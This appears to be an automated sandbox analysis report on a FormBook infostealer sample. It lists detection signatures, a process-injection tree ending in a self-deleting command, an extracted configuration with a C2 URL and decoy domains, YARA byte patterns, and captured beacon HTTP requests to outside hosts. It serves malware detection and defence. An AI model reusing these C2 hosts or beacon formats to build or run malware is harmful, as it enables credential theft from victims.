Loading ...

Play interactive tourEdit tour

Windows Analysis Report mal.pif

Overview

General Information

Sample Name:mal.pif (renamed file extension from pif to exe)
Analysis ID:452374
MD5:b9bca038d7532ec8a1a9ba0e867061bc
SHA1:6596ac1216bf03d88482415755c499ed6388cab4
SHA256:24d91f6c3dcad36d65e45821d520aaabc2f4a87bb1ab512d6807377010d5680e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mal.exe (PID: 5944 cmdline: 'C:\Users\user\Desktop\mal.exe' MD5: B9BCA038D7532EC8A1A9BA0E867061BC)
    • mal.exe (PID: 68 cmdline: C:\Users\user\Desktop\mal.exe MD5: B9BCA038D7532EC8A1A9BA0E867061BC)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 4464 cmdline: /c del 'C:\Users\user\Desktop\mal.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.trendtechpros.com/sm3l/"], "decoy": ["svp-india.com", "feistyflowerfarmers.com", "artprogressive.com", "thedavidweaver.com", "currentputative.life", "bluedot3dwdbuy.com", "xxxmeetme.com", "signify2.com", "converseshoes-canada.com", "schemabuilder.net", "crmcti.com", "mctrh.com", "ringroadpartners.com", "stresslesspilates.com", "directorytexas.xyz", "sarahcarver.com", "diigveda.com", "lifeliveslive.com", "inprize2020.club", "sellerbantuan-bukalapak.com", "thesawbuddy.com", "vtolworldwide.com", "montespc.com", "mylifeinpark.com", "etten-api.com", "plantersam.com", "themcg.net", "tax-account.net", "laurelhomesgroup.com", "epmconsultants.com", "air.guide", "shopfabrique.com", "publicretirementinfo.com", "diversifiedforest.com", "bodurm.com", "aphroditesspiritualshop.com", "vinowolf.com", "teja-online.com", "junion.site", "regenmedica.com", "soulfulparent.com", "elcorazondemama.com", "bench-oat.com", "abrewhomes.com", "premiocovid-19.com", "palmaunlocked.com", "bylauralittle.com", "stikepage.com", "miabogadorolon.com", "hungyivn.com", "interlacer.com", "liang831113.com", "onlinepracticebox.com", "easycookingmastermind.com", "murderofasun.tech", "mybabytennis.com", "margaritagift.com", "utx88.com", "bofengjiaoyegs.com", "reforming-toilets.xyz", "eaoaj.com", "only-king.com", "nearinn.com", "fitsportshop.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5409:$sqlite3step: 68 34 1C 7B E1
    • 0x551c:$sqlite3step: 68 34 1C 7B E1
    • 0x5438:$sqlite3text: 68 38 2A 90 C5
    • 0x555d:$sqlite3text: 68 38 2A 90 C5
    • 0x544b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x5573:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.mal.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.mal.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.mal.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        2.2.mal.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.mal.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.trendtechpros.com/sm3l/"], "decoy": ["svp-india.com", "feistyflowerfarmers.com", "artprogressive.com", "thedavidweaver.com", "currentputative.life", "bluedot3dwdbuy.com", "xxxmeetme.com", "signify2.com", "converseshoes-canada.com", "schemabuilder.net", "crmcti.com", "mctrh.com", "ringroadpartners.com", "stresslesspilates.com", "directorytexas.xyz", "sarahcarver.com", "diigveda.com", "lifeliveslive.com", "inprize2020.club", "sellerbantuan-bukalapak.com", "thesawbuddy.com", "vtolworldwide.com", "montespc.com", "mylifeinpark.com", "etten-api.com", "plantersam.com", "themcg.net", "tax-account.net", "laurelhomesgroup.com", "epmconsultants.com", "air.guide", "shopfabrique.com", "publicretirementinfo.com", "diversifiedforest.com", "bodurm.com", "aphroditesspiritualshop.com", "vinowolf.com", "teja-online.com", "junion.site", "regenmedica.com", "soulfulparent.com", "elcorazondemama.com", "bench-oat.com", "abrewhomes.com", "premiocovid-19.com", "palmaunlocked.com", "bylauralittle.com", "stikepage.com", "miabogadorolon.com", "hungyivn.com", "interlacer.com", "liang831113.com", "onlinepracticebox.com", "easycookingmastermind.com", "murderofasun.tech", "mybabytennis.com", "margaritagift.com", "utx88.com", "bofengjiaoyegs.com", "reforming-toilets.xyz", "eaoaj.com", "only-king.com", "nearinn.com", "fitsportshop.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: mal.exeVirustotal: Detection: 60%Perma Link
          Source: mal.exeMetadefender: Detection: 20%Perma Link
          Source: mal.exeReversingLabs: Detection: 63%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: mal.exeJoe Sandbox ML: detected
          Source: 2.2.mal.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: mal.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: mal.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.469738032.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.trendtechpros.com/sm3l/
          Source: global trafficHTTP traffic detected: GET /sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk HTTP/1.1Host: www.mybabytennis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk HTTP/1.1Host: www.sarahcarver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 209.99.64.55 209.99.64.55
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk HTTP/1.1Host: www.mybabytennis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk HTTP/1.1Host: www.sarahcarver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.mybabytennis.com
          Source: explorer.exe, 00000003.00000000.291630599.0000000004DF3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mal.exe, 00000000.00000003.204191241.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.2
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: mal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: mal.exe, 00000000.00000003.204823498.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comi
          Source: mal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comig
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: mal.exe, 00000000.00000003.204733994.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.p
          Source: mal.exe, 00000000.00000003.204874236.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
          Source: mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com-mI:
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: mal.exe, 00000000.00000003.207611132.000000000800A000.00000004.00000001.sdmp, mal.exe, 00000000.00000003.207500666.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: mal.exe, 00000000.00000003.209299719.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: mal.exe, 00000000.00000003.208234930.000000000800A000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: mal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersP
          Source: mal.exe, 00000000.00000003.209521434.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
          Source: mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp, mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersz
          Source: mal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers~
          Source: mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalice:i
          Source: mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalssys
          Source: mal.exe, 00000000.00000003.210270469.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
          Source: mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomde:i
          Source: mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comde:i
          Source: mal.exe, 00000000.00000003.207824329.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com
          Source: mal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
          Source: mal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
          Source: mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comld9
          Source: mal.exe, 00000000.00000003.207500666.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsivo
          Source: mal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtui
          Source: mal.exe, 00000000.00000003.207782523.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comuei
          Source: mal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comuetow:
          Source: mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueu
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: mal.exe, 00000000.00000003.204191241.000000000800E000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: mal.exe, 00000000.00000003.204496454.0000000008007000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/D
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: mal.exe, 00000000.00000003.204185338.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0
          Source: mal.exe, 00000000.00000003.204286511.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn8
          Source: mal.exe, 00000000.00000003.204249088.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns-m_=
          Source: mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/R:
          Source: mal.exe, 00000000.00000003.211735765.0000000008027000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krT
          Source: mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krn
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: mal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
          Source: mal.exe, 00000000.00000003.205652032.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/49
          Source: mal.exe, 00000000.00000003.206069922.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-p
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/e:i
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es-mI:
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/49
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/sys
          Source: mal.exe, 00000000.00000003.205710785.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/pt-p
          Source: mal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sys
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/v
          Source: mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w:
          Source: mal.exe, 00000000.00000003.211460680.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.p%zzm
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/All_Inclusive_Vacation_Packages.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/Best_Penny_Stocks.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoB
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.mybabytennis.com/High_Speed_Internet.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lpt
